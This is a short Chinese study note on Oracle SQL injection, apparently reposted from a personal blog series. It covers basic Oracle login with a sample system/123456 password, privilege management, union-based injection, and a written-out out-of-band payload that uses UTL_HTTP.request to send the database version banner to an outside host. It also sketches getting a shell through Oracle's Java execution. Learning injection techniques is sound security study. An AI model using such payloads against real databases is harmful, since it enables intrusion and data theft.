码迷,mamicode.com
首页 > 数据库 > 详细

DAY9:SQL注入8-Oracle

时间:2019-10-07 18:04:58      阅读:119      评论:0      收藏:0      [点我收藏+]

标签:根据   info   space   ace   none   oracle   details   shell   font   

一、Oracle基本使用
1. 如何登陆Oracle
打开cmd输入sqlplus(windows server 2008)
用户名:system
密码:123456
 
2. 增删改查
技术图片

 

 

 
二、Oracle权限控制
1. Oracle权限(重点
技术图片

 

 

2. 用户权限管理
技术图片
以system账号登录默认DBA权限
 
3. 表权限管理
技术图片

 

 

 
三、Oracle注入
1. union注入(判断回显点的时候要先确定数据类型,根据类型来union select,并且union语句也要from一个数据库,一般用dual测试,from dual
技术图片
 
2. 利用UTL_HTTP进行注入(常规注入是In Band,这里是OOB--Out Of Band),需要DBA的权限
技术图片
and (UTL_HTTP.request(‘http://192.168.18.145/sql/Less-1/index.php?id=‘||(select banner from sys.v_$version where rownum=1)))<‘a‘--
 
3. 利用Oracle注入拿下系统shell(待测试)
技术图片
原理:Oracle数据库可以利用java代码执行命令
 
 

DAY9:SQL注入8-Oracle

标签:根据   info   space   ace   none   oracle   details   shell   font   

原文地址:https://www.cnblogs.com/niangaoSDS/p/11631233.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!